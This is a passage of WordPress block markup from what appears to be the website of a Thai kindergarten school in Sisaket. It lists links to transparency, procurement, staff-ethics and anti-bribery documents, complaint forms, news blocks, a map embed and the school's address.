-->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 